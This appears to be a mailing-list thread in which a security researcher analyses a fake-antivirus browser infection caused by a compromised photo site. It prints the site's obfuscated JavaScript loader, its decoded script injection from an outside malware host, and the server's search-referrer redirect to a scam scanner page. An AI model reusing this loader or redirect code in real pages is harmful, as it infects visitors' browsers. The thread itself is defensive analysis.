http://www.marja-leena-rathje.info/ssp_director/config/conf/article163.html
I could not close FireFox, and it required a reboot to stop the popups. After rebooting the first time I ran FireFox a tab called “My Computer???” came up with the bogus antivirus supposedly scanning the C:\Windows\System folder…(in Ubuntu – ROFL), but I was able to close the tab that time, and it didn’t come back after that.
The site you visited is very malicious, it has several pages that attack your browser and exploit various vulnerabilities in your browser.
You appear to have been infected with a malware, of some sort, that is causing Firefox to display a bogus welcome page.
= Sample =
var q = “puron”;
function D(Ws,Q){if(!Q){Q=‘prR/]jTf1Bg<nxl6Xd;cIG|^$i@aN:4%.hHzb3FYCQAW9Z{KD[7m(*,w&sLEqy#=’;}var L;var yv=‘’;for(var k=0;k<Ws.length;k+=4){L=(Q.indexOf(Ws.charAt(k))&255)<<18|(Q.indexOf(Ws.charAt(k+1))&255)<<12|(Q.indexOf(Ws.charAt(k+2))&255)<<(6)|Q.indexOf(Ws.charAt(k+3))&255;yv+=String.fromCharCode((L&16711680)>>16,(L&65280)>>8,L&255);}eval(yv);}D(’iTyz:|3aYX{:wBQ:TICBm[m$7NWBwBQNfX.NwBz6;BC:fdDlHqK:w:w<FsNTG7N,y{$|[C:fdD<FxKacC&n/.D<,xY@;H@|&K:,Gh:Th3NHsDa/yQi/(sl/$,n/]F@mD:^BKaHi{$|36^dF:/pDn;i7i|$yB7Z3N,xhNTICiTyz:|3aYX{NFGFi^B7i^1Qg7NH6zDKN,nYg7:7@^r(6HNQl7p.’);
===
== Which translates to ==
document.write(‘<sc’<ins>‘ript src="http://www.mypersonalhttp.com:8080/cgi-bin/weather.pl?id=986601&k=puron&name=tft001&ref=’</ins>escape(document.referrer)<ins>‘“></sc’</ins>‘ript>’);
==
Which is of course a malware site :)
== Contacting that server returns… ==
if (document.styleSheets0){document.styleSheets0.disabled = true;};var r = “google”;if (r.indexOf(“google”) != -1 || r.indexOf(“live”) != -1 || r.indexOf(“bing”) != -1 || r.indexOf(“yahoo”) != -1 || r.indexOf(“search”) != -1 || r.indexOf(“result”) != -1 || r.indexOf(“cache”) != -1 || r.indexOf(“translate”) != -1) {document.write(‘<sc’<ins>‘ript> document.location=“http://goaddscan.com/?uid=152” </sc’</ins>‘ript>’);} else { document.title = “404 Not Found”;document.write("< h1>Not FoundThe requested URL " + location.pathname + " was not found on this server.
<hr><address>Apache/1.3.33 Server at " + location.hostname + " Port 80</address>
===
Which is the infecting agent… downloaded through goaddscan.com …
I can continue, but it is a bit long :)
Good luck
Thanks,
Noam Rathaus
Beyond Security
http://www.beyondsecurity.com
>The site you visited is very malicious, it has several pages that attack your browser and exploit various vulnerabilities in your browser.
Hmmm … I wonder if that applies to all of the following results for that specific portion of the site. I bet the site owner has no clue that the site is being used in this way. :-(
Results 1 – 100 of about 1,260 from www.marja-leena-rathje.info/ssp_director/config/conf.
http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=0aZ&num=100&q=site%3Awww.marja-leena-rathje.info%2Fssp_director%2Fconfig%2Fconf&aq=f&oq=&aqi==
The even more frustrating thing here is that Google just scanned this site yesterday and didn’t find a problem.



